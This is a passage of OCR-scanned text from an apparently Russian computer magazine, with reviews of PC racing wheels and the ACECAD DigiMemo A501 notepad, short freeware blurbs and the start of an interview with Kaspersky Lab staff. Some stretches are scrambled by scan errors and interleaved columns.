устройства занимает меньше мину- 
ты: достаточно войти в настройки и 
поработать педалями, пару раз по- 
крутить руль и понажимать подруле- 
вые лепестки. 

> — минусы. Серебристый руль 
полностью выполнен из пластика, 
что заставляет сомневаться в его 
исключительной долговечности. Ав- 
томатическое центрирование руля 
установлено по умолчанию, и изме- 
нить ситуацию возможно только хи- 
рургическим вмешательством: необ- 
ходимо снять пружины, после чего 
ты сразу лишаешься гарантии и про- 
падает легкое сопротивление при 
вращении. Угол поворота руля огра- 
ничен 180 градусами, что не пока- 
жется шикарным любителям авто. 
Как таковой, обратной связи нет. 
Два вибромоторчика имитируют 
дрожание руля при смене дорожно- 
го покрытия или столкновениях, но 
абсолютно не оказывают сопротив- 
ления. Педали довольно чувстви- 
тельные и имеют достаточную длину 
хода, но упругости не хватает — по- 
ложить ногу и нажимать при необхо- 
димости не получится. 


* 
* лучшая * 


nokynka 
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МАТЕРИАЛ: пластик, прорезиненный руль 


УГОЛ ПОВОРОТА РУЛЯ: 240 градусов 


КОЛИЧЕСТВО ОСЕЙ: 2 


КОЛИЧЕСТВО КНОПОК: 6 


БОНУС: 2 подрулевых переключателя, 
ступенчатая КПП 


> — плюсы. До загрузки трассы по- 
вернуть баранку будет непросто. Но 
не стоит пугаться, так как автоцент- 
рирование включено по умолчанию. 
Загрузив трассу, ты сразу почувст- 
вуешь «легкость» в руках. Сопро- 
тивление исчезает, и остается толь- 
ко жать педаль газа. 


Стоит отметить, что ход педали газа 
больше, чем педали тормоза, и это 
очень удобно. Упругости вполне дос- 
таточно, чтобы не напрягать ноги и 
оставить ступни на педалях. Работа 
обратной связи или Force Feedback 
начинает проявляться тогда, когда 
меняется дорожное покрытие — от- 
личная передача вибрации на руле- 
вую колонку, даже притом, что регу- 
лировка мощности вибродвигателей 
не была выставлена на максимум. 
Столкновения, резкое включение 
ручника и даже юз отлично ощуща- 
ются, благодаря чему можно вовре- 


мя откорректировать траекторию 
движения. Прорезиненный руль мо- 
жет оказаться большим для ребен- 
ка, но диаметр колеса подобран 
очень удачно, а угол вращения 

в 240 градусов позволит вести ма- 
шину аккуратно. На программируе- 
мые шесть кнопок можно повесить 
различные функции, благо они рас- 
положены очень удачно. Любителям 
переключать передачи вручную 
Logitech приготовила сюрприз: два 
больших подрулевых лепестка и 
двухпозиционная КПП, причем ручку 
можно установить как справа, так и 


слева от руля. Щелчки ручки доволь- 
но громкие, и даже во время жаркой 
гонки не возникнет проблем с перек- 
лючением передачи. 

> — минусы. Рулевая консоль до- 
вольно массивна и фиксируется 
только одним прижимным винтом. 
Роль струбцины в таком варианте 
досталась самому корпусу, так что, 
если немного переусердствуешь при 
креплении, сломаешь пластик. Огор- 
чило отсутствие «тарелки» на при- 
жимном винте и большой зазор, ко- 
торый остается в крайнем закручен- 
ном положении. 
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* 
* выбор * 


редакции 


* == * 
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МАТЕРИАЛ: пластик, прорезиненный руль, 
алюминиевые педали 


УГОЛ ПОВОРОТА РУЛЯ: 240 градусов 


КОЛИЧЕСТВО ОСЕЙ: 5 


КОЛИЧЕСТВО КНОПОК: 8 


БОНУС: крест (джойстик), подрулевые 
переключатели, подрулевые аналоговые 
рычаги, двухпозиционный рычаг КПП, 
возможность подключения дополнительного 
педального узла 


> = плюсы. Небольшая коробка 
скрывает в своих недрах довольно 
крупную панель руля, педальный 
узел с алюминиевыми накладками, 
блок питания и диск. Калибровка 
устройства произойдет автомати- 
чески после подключения руля к 


компьютеру: руль несколько раз по- 
вернется сам, так что не стоит бес- 
покоиться о том, что он работает 
без твоего вмешательства. Проре- 
зиненный руль отлично ложится в 
руки, и все кнопки управления на- 
ходятся именно там, где им поло- 
жено быть. Количество аналоговых 
осей в количестве пяти штук позво- 
лит не только регулировать отдель- 
но газ и тормоз, но и плавно конт- 
ролировать сцепление и ручник. 
Подрулевые переключатели делят- 
ся на две группы: кнопки (для пе- 
реключения скоростей) и аналого- 
вые, на которые можно повесить 
любые функции, где необходимо 


плавно изменять величину нагруз- 
ки. Присутствует возможность 
подключить второй блок педалей, 
чтобы они работали в качестве руч- 
ного тормоза и сцепления. Прямо 
во время гонки можно переключать 
режимы работы осей: 2, 3 или 5. 
Достаточно нажать обе педали од- 
новременно и утопить кнопку режи- 
ма (самая нижняя на руле). Количе- 
ство рабочих осей можно выяснить 
не только в настройках, но и по 
свечению светодиода: три разных 
цвета (зеленый, оранжевый и крас- 
ный) сигнализируют о различном 
количестве подключенных осей. 
Руль оснащен системой автоцент- 


рирования, которую также можно 
активировать (светодиод мигает) 
или дезактивировать (светодиод го- 
рит постоянно) во время игры. Дос- 
таточно нажать на ту самую кнопку 
смены режима. Работа обратной 
связи вызывает бурную радость у 
всех игравших с этим рулем: высо- 
кий уровень реалистичности, кото- 
рый можно ощутить при скольже- 
нии, заносе или смене дорожного 
покрытия, свидетельствует о высо- 
ком качестве девайса. 

> = минусы. Длины провода доста- 
точно для удобного размещения пе- 
дального узла, но игрок не сможет 
вытянуть ноги полностью. 


ВЫВОДЫ: БЕЗУСЛОВНЫМ ЛИДЕРОМ ТЕСТА СТАЛА МОДЕЛЬ THRUST- 
MASTER RGT FORCE FEEDBACK PRO, КОТОРАЯ ОБЛАДАЕТ НЕ ТОЛЬКО 
ОТЛИЧНО РЕАЛИЗОВАННОЙ ОБРАТНОЙ СВЯЗЬЮ, НО И САМЫМИ ШИ- 
РОКИМИ ВОЗМОЖНОСТЯМИ ДЛЯ ПОВЫШЕНИЯ РЕАЛИСТИЧНОСТИ ИГ- 
РОВОГО ПРОЦЕССА. «ВЫБОР РЕДАКЦИИ»! 


МАТЕРИАЛ: пластик, прорезиненный руль 
УГОЛ ПОВОРОТА РУЛЯ: 240 градусов 
КОЛИЧЕСТВО ОСЕЙ: 5 

КОЛИЧЕСТВО КНОПОК: 8 


БОНУС: крест (джойстик), подрулевые 
переключатели, совместимость с PlayStation 


> — плюсы. Компания купила ли- 
цензию и добавила бренд Ferrari 

в название этого руля не случай- 
но. Это практически точная копия 
баранки, устанавливаемой на се- 
рийные автомобили. Надежно при- 
крепить девайс к столу поможет 
специальная двухконтактная плас- 
тиковая лапа с резиновыми упора- 
ми, которая крепится металличес- 
ким болтом к рулевой консоли. 
Трехспицевый руль выполнен из 
пластика, а на месте захвата для 
рук он имеет резиновые накладки. 
Эргономичная форма и продуман- 
ность расположения элементов уп- 
равления отразились в том, что 
практически на все кнопки можно 
нажимать не смещая ладони. Под- 
рулевые переключатели располо- 
жены достаточно близко к паль- 
цам и пронумерованы так же, как 
и все остальные кнопки. 

По традиции руль обладает 
автоматическим центрированием, 
которое активируется нажатием са- 
мой нижней кнопки на руле. Свето- 


МАТЕРИАЛ: пластик, прорезиненный руль 


УГОЛ ПОВОРОТА РУЛЯ: 180 градусов 


КОЛИЧЕСТВО ОСЕЙ: 3 


КОЛИЧЕСТВО КНОПОК: 4 


БОНУС: подрулевые переключатели 


> плюсы. Руль от Saitek обращает 
на себя внимание необычной формой 
рулевой колонки и педалей: вместо 
эмуляции автомобильного торпедо 
производитель решил использовать 
крепление механики вдоль оси вала. 
Рулевая колонка займет немного мес- 
та на столе и сможет устоять даже без 
фиксации, но для активной работы 
есть специальная струбцина. Пласти- 
ковое П-образное устройство, кото- 
рое легко снимается и так же легко 
устанавливается, надежно зафикси- 
рует руль на столе любой толщины. 
Для полноценной работы должен 
быть подключен адаптер, который 
обеспечит мотор обратной связи не- 
обходимым питанием. На руле име- 
ются четыре кнопки, расположенные 
в местах касания большими пальца- 
ми. Прорезиненные участки демон- 
стрируют правильный хват. В центре 
руля расположены светодиодные 
индикаторы силы обратной связи. 

В процессе игры они наращивают 
интенсивность (от зеленого к крас- 


диодный индикатор оповещает о 
выбранном режиме. Блок педалей 
имеет не очень длинный кабель, но 
его вполне хватит для удобного раз- 
мещения узла под столом. Размер 
педалей немаленький, они разнесе- 
ны на достаточное расстояние, что- 
бы не цепляться за них ступнями. 
Упругость пружин позволяет спокой- 
но положить ноги, не боясь, что про- 
давится педаль. От проскальзыва- 
ния по полу спасут удобные ножки. 
Системе обратной связи необходи- 
мо дополнительное питание, для че- 
го в комплекте прилагается адап- 
тер. После подключения руля к USB 
происходит автоматическая калиб- 
ровка, и спустя несколько секунд 
руль будет готов к работе. Мощ- 
ность двигателя, обеспечивающего 
работу Force Feedback, такова, что 
даже при стандартных настройках 
руль довольно ощутимо вырывается 
из рук, но есть функция усиления 
обратной связи до 150%. Существу- 
ет возможность подключить руль 

к игровой приставке PlayStation, для 
чего на кабеле присутствует соот- 
ветствующий разъем. 

> — минусы. В режиме автомати- 
ческого центрирования руля свето- 
диод-индикатор довольно ярко све- 
тит красным, что отвлекает и не- 
много раздражает. 


ному), тем самым обозначая величи- 
ну сопротивления или скорость по- 
ворота. Установить блок педалей 
тоже очень просто. Для увеличения 
устойчивости в комплект добавлена 
специальная накидывающаяся план- 
ка, на которой можно расположить 
ноги. Необычная установка педалей 
повторяет автомобильную, тем са- 
мым увеличивая реалистичность. 
Расстояние между газом и тормо- 
зом достаточное, и спутать педали 
никак не удастся. Использование 
оптической системы вместо резис- 
тивных элементов значительно по- 
высило надежность и долговеч- 
ность девайса. 

> — минусы. Применение необыч- 
ной технологии сыграло свою поло- 
жительную роль, но сопротивление 
педалей слишком мало, и нога, ког- 
да играешь, порой просто «провали- 
вается». Красные и желтые кнопки 
на черно-сером руле выглядят не- 
сколько аляповато, а индикаторы 
силы обратной связи во время игры 
только отвлекают. Подрулевые пе- 
реключатели-лепестки срабатывают 
только при довольно сильном нажа- 
тии и без характерного щелчка, так 
что сложно понять, переключена ли 
передача. 


«ЛУЧШЕЙ ПОКУПКОЙ» СТАЛ LOGITECH МОМО RACING БЛАГОДАРЯ ОТ- 
ЛИЧНОЙ РЕАЛИЗАЦИИ ОБРАТНОЙ СВЯЗИ И ЭРГОНОМИЧНОСТИ. 

НУ ЧТО? ЕЩЕ НЕ РЕШИЛСЯ ПОСТАВИТЬ НА СВОЙ СОВЕРШЕННО 
НАСТОЯЩИЙ АВТОМОБИЛЬ КАКОЙ-НИБУДЬ ИЗ ТАКИХ «ИГРУШЕЧНЫХ» 


РУЛЕЙ? ;-) 


ОФФТОПИК 


nard 


блокнот-автомат 


ACECAD DIGIMEMO A501 


ПЛАНШЕТ. ОБЫЧНО TAK НАЗЫВАЮТ УСТРОЙСТВО В ВИДЕ 
КОРПУСА С РАБОЧЕЙ ОБЛАСТЬЮ И НЕПОСРЕДСТВЕННО 
ЭЛЕКТРОННОЕ ПЕРО. ОДНАКО БОЛЬШИНСТВО ПЛАНШЕТОВ 
ПОДДЕРЖИВАЮТ РАБОТУ ТОЛЬКО ПРИ ВКЛЮЧЕННОМ 
КОМПЬЮТЕРЕ. УСТРОЙСТВО ACECAD DIGIMEMO A501 
ПО-СВОЕМУ УНИКАЛЬНО, ХОТЯ БЫ ПОТОМУ ЧТО OHO 
РАБОТАЕТ НЕЗАВИСИМО ОТ ТВОЕГО ПК — ТЫ ОБЩАЕШЬСЯ 

С НИМ С ПОМОЩЬЮ ОБЫЧНОЙ ПИСЧЕЙ БУМАГИ! ОДНАКО ОБО 
ВСЕМ ПО ПОРЯДКУ попов ЕВГЕНИЙ 


Test_lab выражает благодарность за предоставленное на тестирование 
оборудование компании: 
Ауасот, Www.avacom.ru, (495) 730-74-54 


ЦЕНА: $130 

РАЗМЕРЫ, ММ: 309х209 

РАБОЧАЯ ОБЛАСТЬ, ММ: 150х211 

ВЫСОТА ЧУВСТВИТЕЛЬНОЙ ЗОНЫ, ММ: 12 

ВЕС (БЕЗ БАТАРЕЙ), Г: 512 

ВЕС (С БАТАРЕЯМИ), Г: 560 

ВСТРОЕННАЯ ПАМЯТЬ, МБ: 8 

ТИП ПОДДЕРЖИВАЕМОЙ ПАМЯТИ: CompactFlash (CF) 
ИНТЕРФЕЙС ПОДКЛЮЧЕНИЯ К ПК: USB 

ИСТОЧНИКИ ПИТАНИЯ: 4 батареи типа ААА, 1 батарея-таблетка 


Устройство выглядит как простая пластиковая подставка черного цвета под 
блокнот для удобного письма. В комплект входит обычный блокнот, цифровое 
чернильное перо, собственно портативный планшет, два заменяемых стержня, 
комплект из четырех батареек формата ААА, одна батарейка 1,55 В, зажим для 
бумаги, диск с программным обеспечением и УЗВ-кабель для подключения уст- 
ройства к персональному компьютеру. Перо похоже на обычную ручку. Оно эр- 
гономично, питается от 1,5 В батарейки-таблетки, держать его в руке удобно. 
Основная особенность устройства — высота чувствительной зоны (целых 
12 мм), что позволяет планшету ACECAD DigiMemo A501 работать с толсты- 
ми кипами бумаги. Стоит отметить, что для большинства обычных планшетов 
высота зоны чувствительности не превышает 5-6 мм. Однако рабочая об- 
ласть планшета не очень велика и подходит только для листов формата 
блокнота, который прилагается в комплекте. После того как чистые листы 
в блокноте закончатся, пользователю придется искать в канцелярских мага- 
зинах новый, который подходил бы по размеру. 

К защелке для бумаги тоже предъявлю претензии. Дело в том, что при 
работе она постоянно отстегивается и слабо держит рабочие листы. В левом 
верхнем углу корпуса находится небольшой дисплей размерами 1,75 на 3 
см. В процессе работы на нем отображается номер страницы, используемой 
в памяти (всего их может быть порядка тысячи), а при письме высвечивается 
изображение стилуса. Исписанные страницы также отображаются на экран- 
чике в виде определенного логотипа, так что запутаться очень сложно. 


Работа с устройством в общем легкая и приятная. Ручка-перо удобно крепит- 
ся к корпусу планшета, а для запасных стержней предусмотрен специальный 
отсек — они всегда будут под рукой. Время жизни батареек, по словам про- 
изводителя, ограничено 100 часами, причем все это время нужно непрерыв- 
но что-то писать. Проверить этот факт довольно сложно, но даже если име- 
ется возможность поработать хотя бы 80 часов, уже весьма неплохо. 

Перо удобно лежит в руке и пишет синими чернилами, чернил черного цвета 
в комплекте нет. Кстати, стержни стандартные, такие можно приобрести в 
обычном канцелярском магазине. Главное — найти именно железные. 

Жаль, что не получится просто перенести записи на ПК в определен- 
ном формате MS Word или, на худой конец, в JPEG. Однако распознавание 
текста и нормализация рисунков поддадутся дополнительному ПО, если ты 
купишь его отдельно. Для этого на прилагаемом диске имеется специаль- 
ное программное обеспечение — ACECAD DigiMemo Manager. Подсоединя- 
ешь планшет к ПК, и утилита помогает тебе сохранить написанные страни- 
цы в файлах со специальным расширением DHW. При желании полученные 
документы можно конвертировать в удобоваримые форматы. 

Софт удобен в использовании и не требует каких-либо особых навыков 
работы с компьютером. В целом впечатления, которое складываются при ра- 
боте с девайсом, скорее положительные. Цифровой блокнот ACECAD DigiMemo 
А501 будет хорошим помощником и делового человека, и студента, а благода- 
ря привлекательной цене станет хорошим подарком для родных и близких № 


<html> 
<head> 


<meta http-equiv="Expires" content="never" /> 

<meta name="generator" content="CMEL] 06.06(67)" /> 

<meta name="keywords" content="HTML 4.0,CSS, 

движки, PHP, сайты, Web2.0, RSS, AJAX, web-cepsncni, баги" /> 
<meta name="description" content="AkTyanbHbie вопросы 
ммеб-программирования" /> 


</title> 
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<body> 


<h3>CKopo в Cneye:</h3></br> 

<6>Админинг.</5 >Установка, настройка и поддержка 
компьютерных систем и сетей. <Ьг /> 

<b>BSD.</b>YctTaHoska, настройка, управление В$0-системами. 
История. Безопасность. <Ъ кг /> 

<b>Windows Vista.</b>B3rnag изнутри. Подробный анализ новой ОС 
от Microsoft. Новейшие технологии. Удобство и быстрота работы. 


<body> 
</html> 
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Easy MPS Alarm Clock 1.0 


Очень простая программа-будильник. Самое приятное из ее досто- 


инств — возможность поставить в качестве звонка любой аудиофайл 


в МР3З-формате. Благодаря удобному и понятному интерфейсу ты за несколько секунд настроишь 
будильник на нужное время. Программа бесплатна и работает на всех операционных системах се- 


мейства Windows. 


Weather 
Watcher 5.6.7 
Эта бесплатная 
программа показы- 
вает погоду для лю- 
бого города мира. 
Теперь ты сможешь 
ежечасно просмат- 
ривать текущие по- 
годные условия, 
ежедневно — де- 
тальный прогноз 

и созданные карты по любому городу мира. 
Weather Watcher — небольшая настольная по- 
годная станция, которая спокойно сидит в 
систрее системы и автоматически обновляет 
сведения о погоде в указанном интервале вре- 
мени. Софтина выдает текущий прогноз, вклю- 
чает в него температуру, температуру «на ощу- 
щение» (которую ощутит человек, одетый по 
сезону), влажность, ветер, видимость, давле- 
ние и ультрафиолетовое излучение. 

Weather Watcher предоставит и 10-днев- 
ный прогноз: общее состояние окружающей 
среды, температурные максимумы и минимумы, 
ожидаемый уровень ультрафиолетового излу- 
чения (сможешь выбрать, когда стирать данные 
с чипов с УФ-стиранием ;)). Погодные измере- 
ния могут быть выражены в метрических или 
английских единицах. 


AntiVir Personal Edition 7 
Бесплатный антивирус германс- 
кой сборки включает в себя ан- 
тивирусный сканер, антивирус- 
ный монитор и базу данных бо- 
лее чем на 150 000 вирусов. 
Добавлю от себя: он находил у меня такое, 

о чем молчали многие известные его собратья. 
Отдельно хочу отметить хороший эвристичес- 
кий анализатор, который не раз помогал мне 
избавиться от новых и спрятанных троянов :). 


Traffic Counter 1.3 
Новая версия простенькой 
программы для учета тра- 
фика в локальной сети при 
модемном, ADSL- и т.п. или 
Фа|--ир-соединении. Отдельно по каждому сое- 
динению Traffic Counter подсчитает входящий 

и исходящий трафик. Сумеет вычислить, 
сколько денег ты потратил на трафик, прос- 
матривать историю, узнавать текущую ско- 
рость соединения, работать с трея. Программа 
автоматически ставится в автозагрузку при 
первой инсталляции. 


AutoHotkey 1.0.43.05 
Программа позволяет вешать 
действия на горячие клавиши и пере- 
назначать команды, которые вводят- 
ся с клавиатуры, мышки или джойс- 
тика. И многое другое... Ну, как тут 
не попробовать? ;) 


Sony ACID Pro 6.0 Build 214 


Мощный инструмент для создания му- 
зыки, ремиксов, саундтреков с помощью 
1оор’ов (поддерживается формат 5.1). 

Несмотря на загруженный интер- 
фейс, освоить программу и работать в ней 
очень просто. Может работать с неогра- 
ниченным количеством дорожек и оор’ов. 
Есть импорт-экспорт музыки в WAV, WMA, 
RM, АМ, MP3. 


Apollo DivX to DVD Creator v2.7.0 
Транскодер АМ/МРЕС-видеофайлов в DVD- 
формат с прожигом (записью) Bugeo-DVD. 
Поддерживает Divx, Xvid, АМ, MPG и другие 
форматы видео. Кодирует в MPEG2, совмести- 
мый с DVD-cbopmatom. Поддерживает NTSC- 

и PAL Т\-системы с перекодированием, подде- 
ржкой широкоформатного и стандартного раз- 
мера экрана. Прожигает стандартные DVD- 
диски, причем поддерживаются бытовые про- 
игрыватели и большинство пишущих приводов 
DVD-R/RW и DVD+R/RW. Есть предварительный 
просмотр резуль- 
тата, автомати- 
ческое выключе- 
ние компьютера 
после заверше- 
ния работы кон- 
вертера. Высокое 
качество и высо- 
кая скорость, 
простой и удоб- 
ный интерфейс. 


WIDI 3.2 

Переведена на русский язык 
новая версия программы WI- 
DI 3.2. Качественно улучшен 
интерфейс, добавлены но- 
вые возможности. Основная 
задача WIDI — это распозна- 
вание музыки. Музыкальная 
запись может быть предс- 


Keyboard Maniac 
Буду краток. Менеджер горячих клавиш Keyboard Maniac 
(KeyMan, КМ) предназначен для работы с расширенными 
мультимедийными клавиатурами. КеуМап крепко дружит с 
WinAmp’om и Light Alloy, перехватывает системные нажатия 
клавиш (<Win>+<D>, <Win>+<R>...) без залипания модификаторов. Много настоек 
и функциональных возможностей, которых нет в программах-аналогах. 

Программа проста в управлении, но содержит множество дополнительных настроек, 
то есть подходит и новичкам, и профессионалам — настоящим клавиатурным маньякам. 


тавлена в двух различных формах: звуковая волна и нот- Особое внимание уделено управлению мультимедийным проигрывателем Nullsoft Winamp 
ная запись. Звуковая волна — это запись зависимости (поддерживаются версии 2.x и 5.x, версия 3.x — нет). Достоинства программы: 

звукового давления от времени. Примерами могут служить 

файлы формата WAV и MP3, магнитофонные записи и т.д. — ИСПОЛЬЗУЙ НА ЗДОРОВЬЕ ЛЮБЫЕ КЛАВИШИ, В ТОМ ЧИСЛЕ СИСТЕМНЫЕ: 

В таком виде проигрываемый звук в точности совпадает <WIN>+<D>, <ALT>+<TAB>, ЕТС. (ИСКЛЮЧЕНИЕ — <CTRL>+<ALT>+<DEL>, 

с записанным. Тем не менее многие инструменты и звуки, КЛАВИШИ УПРАВЛЕНИЯ ПИТАНИЕМ КОМПЬЮТЕРА И КЛАВИША <ТАВ> БЕЗ 
звучащие одновременно, перекрываются. В результате те- МОДИФИКАТОРОВ). 


бе уже не позволяют изменять что-то (ноты, аранжировку 
ит.д.) в музыкальном произведении. Нотная запись, нап- 
ример обычная партитура или файл формата MIDI, по сути 
представляет собой набор команд: какую ноту и каким 
инструментом следует сыграть. Такая форма записи легко — ЗАПУСКАЙ НЕСКОЛЬКО ДЕЙСТВИЙ НА ОДНУ КЛАВИШУ. 
поддается редактированию и занимает меньше места, чем 
файлы WAV. Однако не любой звук может быть записан 

в такой форме. Например, невозможно записать челове- — СХЕМА ЗАПУСКА ДЕЙСТВИЯ ГИБКАЯ: НАПРИМЕР, ТОЛЬКО ЕСЛИ АКТИВНО 


ческую речь в виде нот. ОПРЕДЕЛЕННОЕ ОКНО ИЛИ ЕСЛИ ОНО СУЩЕСТВУЕТ. 
Задача распознавания, особенно музыкальных запи- 


— ИСПОЛЬЗУЙ КНОПКИ МЫШИ В ГОРЯЧИХ КЛАВИШАХ — MOUSE LBUTTON, 
MOUSE RBUTTON, MOUSE MBUTTON, MOUSE XBUTTON1, MOUSE XBUTTON2 
(НАПРИМЕР <CTRL>+<ALT>+MOUSE МВОТТОМ). 


— ЗАПИСЫВАЙ И ВОСПРОИЗВОДИ КЛАВИАТУРНЫЕ МАКРОСЫ. 


ВВ Sepbestaa waves wisekaa auoenena Универзаньне — ЗАМЕНЯЙ НАЖАТУЮ КЛАВИШУ HA ДРУГУЮ КЛАВИШУ ИЛИ КНОПКУ МЫШИ. 
го решения нет! Тем не менее, WIDI Recognition System вклю- — ЗАМЕНЯЙ КНОПКУ МЫШИ ДРУГОЙ ЕЕ КНОПКОЙ ИЛИ КЛАВИШЕЙ КЛАВИАТУ- 
чает в себя алгоритмы, которые позволяют осуществлять РЫ (НАПРИМЕР: <SHIFT>+MOUSE MIDDLE ЗАМЕНИТЬ НА <ALT>+DBLCLICK). 
распознавание полифонических записей достаточно точно. . 

Более того, значительное число настраиваемых параметров ~~ НАЗНАЧАИ ГОРЯЧИЕ КЛАВИШИ С РАСШИРЕННЫМИ МОДИФИКАТОРАМИ 
позволяет распознавать различные музыкальные стили, (ЛЮБАЯ КОМБИНАЦИЯ ИЗ ЧЕТЫРЕХ МОДИФИКАТОРОВ: <CTRL+>, <ALT+>, 
инструменты и т.д. <SHIFT+>, <WIN+>). 

WIDI, как уникальная многофункциональная система, — ОСВЕДОМЛЯЙСЯ НАСЧЕТ ТЕКУЩЕЙ ЯЗЫКОВОЙ РАСКЛАДКИ С ПОМОЩЬЮ 
включает в себя функции записи и отображения звуковой ЗВУКА (ПОСЛЕ НАЖАТИЯ ОПРЕДЕЛЕННЫХ КЛАВИШ) И/ИЛИ ИКОНКИ В СИС- 
волны, специализированный редактор нот (только версия ТЕМНОМ ТРЕЕ. 

Professional), который позволяет визуально сравнивать р 
спектрограммы ИСХОДНОЙ волны с нотами, полученными рас- ~~ ОТПРАВЛЯИ СООБЩЕН Я ОКНУ ПРИ НАЖАТИИ КЛАВИШИ. 
познаванием. — ПРОГРАММА ПОДДЕРЖИВАЕТ МОДУЛИ РАСШИРЕНИЙ (PLUGIN). СТАНДАРТ 

WIDI умеет читать исходные файлы в некомпрессиро- ОДУЛЕЙ ПРЕДЕЛЬНО ПРОСТ. ИСПОЛЬЗУЯ ИСХОДНЫЙ КОД ГОТОВОГО MO- 
ВАНО WEN MPG) ОБИ ДАЖЕ Seyi, Вторые НЕ МОСВЕ ДУЛЯ, ТЫ МОЖЕШЬ САМ НАПИСАТЬ НУЖНОЕ ДЕЙСТВИЕ (В ДИСТРИБУТИВЕ 
ственно с микрофона, без предварительной записи в. файл ЕСТЬ ИСХОДНЫЙ КОД МОДУЛЯ РАСШИРЕНИЙ, НАПИСАННОГО НА BORLAND 
(распознавание в реальном времени). WIDI распознает зву- DELPHI 7, ОН СОДЕРЖИТ ВСЕ НЕОБХОДИМЫЕ KO ЕНТАРИИ). 


ковую волну и затем: 


НТЕРФЕЙС МНОГОЯЗЫЧНЫЙ. 
— ТЫ ИЗМЕНЯЕШЬ В М/О! АРАНЖИРОВКУ, ВЫСОТНЫЙ = 
ДИАПАЗОН И ТОНАЛЬНОСТЬ; 


РОГРАММА ВЫПУСКАЕТСЯ В НЕСКОЛЬКИХ РЕДАКЦИЯХ, И LITE EDITION By- 
ДЕТ ПОЛЕЗЕН ДЛЯ НАЧИНАЮЩИХ ПОЛЬЗОВАТЕЛЕЙ ИЛИ ДЛЯ ИСПОЛЬЗОВА- 


— УСТРАИВАЕШЬ ПРЕДВАРИТЕЛЬНЫЙ ПРОСМОТР ДЛЯ НИЯ НА СМЕННОМ НОСИТЕЛЕ/НА НЕСКОЛЬКИХ КОМПЬЮТЕРАХ. 
ФАИЛОВ MP3 В КОЛЛЕКЦИЯХ; — ЦИКЛ РАЗРАБОТКИ КОРОТКИЙ: КАЖДЫЙ МЕСЯЦ ВЫХОДЯТ НОВЫЕ ВЕРСИИ, 
— ЗАГРУЖАЕШЬ ЛЮБИМЫЕ МЕЛОДИИ В МОБИЛЬНЫЙ В КОТОРЫХ ИСПРАВЛЕНЫ ОШИБКИ И ПОВЫШЕНА ФУНКЦИОНАЛЬНОСТЬ. 
ТЕЛЕФОН; | 
Жаль, что программа не работает под Windows 9x, Windows Ме. Полностью поддержи- 
—` ПОЛУЧАЕШЬ НОТНЫЕ ЗАПИСИ МУЗЫКАЛЬНЫХ вается только Windows ХР и Windows 2003. На Windows 2000 программа заработает, 
КОМПОЗИЦИИ И ИСПОЛНЯЕШЬ ИХ САМ. но некоторые функции могут оказаться недоступными. 


CPU-Z v.1.33 


Небольшая, HO очень приятная программа для получения под- 
робнейших данных о твоем железе. 

С помощью CPU-Z можно выяснить: название процессора, мо- 
дель; поддерживаемые CPU наборы инструкций и специфика- 
ции; напряжение питания; размер, скорость, технологию, место- 
увеличивать производитель- нахождение кеша Е 1, L2, L3; BIOS, чипсет, память, параметры 
ность. Есть планировщик (на- АСР материнской платы; размер, тип, временные характеристики и спецификацию ус- 
пример, для чистки реестра по расписанию), тановленной оперативной памяти. CPU-Z проста, представляет информацию наглядно, 
уведомления по e-mail, функция Undo (ох как поэтому достаточно популярна. 

нужна) и некоторые фирменные примочки. И 
все это в симпатичном зеленом интерфейсе. 


Amust Registry 
Cleaner v2.1 

Новый подход к очистке и 
поддержанию реестра в акку- 
ратном состоянии. Програм- 
ма умеет исправлять ошибки, 


Moffsoft FreeCalc v1.2.06 


Этот калькулятор — отличная замена windows’OBCKOMy. 
Результаты вычислений можно сохранить в текстовый 
файл или распечатать. Для удобства можно настроить 
под себя цвет кнопок. Бесплатен. Работает под Windows 
95/98/Me/NT/2000/XP 


Opera 9.0 

Новая версия самого быстрого браузера плане- 
ты! Норвежские разработчики не унимаются, 

и опять мы имеем честь наблюдать новый Build. 


ОФФТОПИК 


soft 


лидеры 
тысячелетия 


ИНТЕРВЬЮ С ЛАБОРАТОРИЕЙ 
КАСПЕРСКОГО 


КОМПАНИИ «ЛАБОРАТОРИЯ КАСПЕРСКОГО» УЖЕ ВОСЕМЬ ЛЕТ. ГРУППЕ 
РАЗРАБОТЧИКОВ АНТИВИРУСНОГО ПО, КОТОРОЙ РУКОВОДИТ ЕВГЕНИЙ 
КАСПЕРСКИЙ, — ВДВОЕ БОЛЬШЕ. «ЛАБОРАТОРИЯ КАСПЕРСКОГО» — 

ЭТО 400 ВЫСОКОКВАЛИФИЦИРОВАННЫХ СПЕЦИАЛИСТОВ 1АНАРЕЙ КАРОЛИК 


АНДРЕЙ НИКИШИН, РУКОВОДИТЕЛЬ УПРАВЛЕНИЯ СТРАТЕГИЧЕСКОГО МАРКЕТИНГА 
«ЛАБОРАТОРИИ КАСПЕРСКОГО»: Когда Джим Коллинз (автор книги «От хорошего к Великому») 
задавал этот вопрос руководителям крупнейших мировых компаний, подавляющее большинство из них 
отвечали: «Во всем виноват случай». И нам тоже помог случай. Мы оказались в нужном месте, в нуж- 
ное время, с нужными людьми, и в голове у нас были нужные идеи. Это сейчас у нас есть аналитики, 
которые следят за рынком, есть маркетологи и многие другие полезные люди, а девять лет назад все 
было проще и в каком-то смысле интереснее. Мы были одержимы, и у нас была общая идея — сделать 
лучший антивирус в мире. Такой, чтобы пользователи могли чувствовать себя на 100% защищенными 
от всех вредоносных программ, всегда и при любых обстоятельствах. Именно таким был и таким оста- 
ется наш основной принцип. Говорить, что наш путь был устлан лепестками роз, было бы неправильно. 
Были у нас и роковые ошибки, которые стоили нам очень и очень дорого (последствия выхода неудач- 
ной версии 4.0 мы расхлебываем до сих пор). Но даже в то довольно сложное время нам удалось исп- 
равить собственные ошибки и вернуть доверие пользователей, и сейчас я, честно говоря, не знаю луч- 
шего антивируса с точки зрения предоставляемой защиты. 


АЛЕКСАНДР ГОСТЕВ, ВИРУСНЫЙ ЭКСПЕРТ «ЛАБОРАТОРИИ КАСПЕРСКОГО»: Написать ан- 
тивирус (в классическом смысле этого слова — «сканер файлов») совсем нетрудно. Посмотри на сов- 
ременные популярные антивирусы — практически все они начинались как частные разработки одного, 
максимум двух человек. 

Другое дело, что простой сканер файлов сейчас, по большому счету, никому не нужен, поскольку 
он не удовлетворит основным требованиям текущей ситуации. Обязательно нужен монитор, нужна под- 
держка множества форматов, архиваторов, Nakepos, файрволов. А еще хорошо бы иметь эвристику, по- 
веденческий анализатор, эмулятор и много-много всего того, что сейчас имеется в коммерческих анти- 
вирусах. Все эти компоненты появились не просто как дополнительные «фишечки» — это все требова- 
ния сегодняшнего дня и опыт прошлых лет. 

Давай исходить из реалий: каждый год антивирусная компания должна выпускать новую версию 
